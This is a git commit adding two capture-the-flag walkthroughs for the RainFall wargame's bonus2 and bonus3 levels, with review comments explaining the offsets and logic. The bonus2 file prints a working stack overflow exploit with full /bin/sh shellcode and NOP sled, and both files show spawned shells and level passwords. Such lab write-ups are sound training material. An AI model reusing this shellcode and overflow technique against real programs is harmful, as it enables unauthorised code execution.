chore: walkthrough bonus2 and bonus3

gbrochar 2025-05-20 13:25:05 +02:00
parent 183947e401
commit 9dca234a6a
2 changed files with 62 additions and 0 deletions


@ -0,0 +1,40 @@
Using ghidra we notice LANG env variable is exploited and can be either fi, nl, or something else, defaulting to english. It calls a greeting function and uses both arguments. We'll set it to nl for now.
Fiddling a bit we can make the program segfault, and can make it segfault at any address
```
Starting program: /home/user/bonus2/bonus2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAA aaaaaaaaaaaaaaaaaaaaaaaXXXX
Goedemiddag! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaaaaaaaaaaaaaaaaaaaaaXXXX
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb)
```
let's try to put a shellcode after the x.
We find the argv in the stack at address 0xbffff8c0.
our 'X's are at address 0xbffff919.
let's put our shellcode at 0xbffff920. That's 3 characters between the addresses and the shellcode.
it makes a strange behavior but doesn't work.
```
bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('A'*40)"` `python -c "print('a'*23+'\x20\xf9\xff\xbf'+'a'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"`
bonus2@RainFall:~$
```
let's try putting the shellcode in the first argument
```
bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('\x90'*100+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"` `python -c "print('a'*23+'\xe0\xf8\xff\xbf')"`
Goedemiddag! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>aaaaaaaaaaaaaaaaaaaaaaa<61><61><EFBFBD><EFBFBD>
$ whoami
bonus3
$ cat /home/user/bonus3/.pass
71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587
```
:)
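Review bot: the walkthrough never explains why the overflow lands at 23 bytes into argv[2] or why the first shellcode placement fails, so a reader cannot reproduce the reasoning; the gdb output at the top of the file already contains the explanation and it should be spelled out next to it. The echoed greeting shows exactly 40 'A's and never reaches the 'D' that was supplied in argv[1], i.e. argv[1] is copied with a 40-byte limit and argv[2] is appended after it; with "Goedemiddag! " (13 bytes) in front, 13 + 40 + 23 = 76 bytes sit before the saved return address, which is why the four 'X' bytes end up in EIP ("0x58585858 in ?? ()"). The failed attempt reuses 0xbffff920, an address measured with a 27-byte argv[2], but the payload argv[2] is 76 bytes long (23 + 4 + 3 + 46 bytes of shellcode); argv strings live at the top of the stack, so lengthening one shifts the start of every argv string to a lower address, and on top of that gdb's own environment moves addresses relative to a plain shell, so the return address no longer points at the shellcode. Worth saying that this is why the second attempt moves the shellcode into argv[1] behind 100 NOPs: the sled absorbs the shift. Two smaller points: "LANG env variable is exploited" should read "is read" (LANG only selects the greeting, the overflow is in the concatenation), and the byte salad after "Goedemiddag!" on the success line is the NOP sled being echoed raw; piping through `cat -v` or trimming that line would make the file readable.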


@ -0,0 +1,22 @@
We compare characters of argv[1] the string of the last flag.
But the string of the flag is shortened depending on the value of atoi(argv[1]). If we enter 14, the 14th characters is replaced by a zero.
So maybe we can put a 0, so the string of last flag becomes an empty string.
But then we are comparing "0\0" with "\0", which isn't equal.
Fortunately, atoi on an empty string also returns 0.
```
bonus3@RainFall:~$ ./bonus3 ""
$ whoami
end
$ cat /home/user/end/.pass
3321b6f81659f9a71c76616f606e4b50189cecfea611393d5d649f75e157353c
$ cd /home/user/end
$ cat end
Congratulations graduate!
```
:)
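Review bot: the description of the check is missing its key sentence, so the "0\0" versus "\0" argument in the middle of the file does not follow; state the logic first. The binary zeroes the byte at index atoi(argv[1]) of the flag buffer and then compares argv[1] with that buffer, so any numeric input fails by construction: the digit string itself is never equal to a flag that has been cut at that index, which is exactly the "0\0" versus "\0" case given for 0. The empty string works because both halves collapse: atoi("") returns 0, byte 0 is zeroed, and the comparison becomes "" against "". Grammar: "We compare characters of argv[1] the string of the last flag" is missing "with", and "the 14th characters is replaced" should be "the 14th character is replaced". Also name the file behind "the last flag" (presumably /home/user/end/.pass, which the session then reads), and the invocation runs ./bonus3 from the home directory whereas the bonus2 file uses the absolute path, so either mention the working directory or use /home/user/bonus3/bonus3 for consistency.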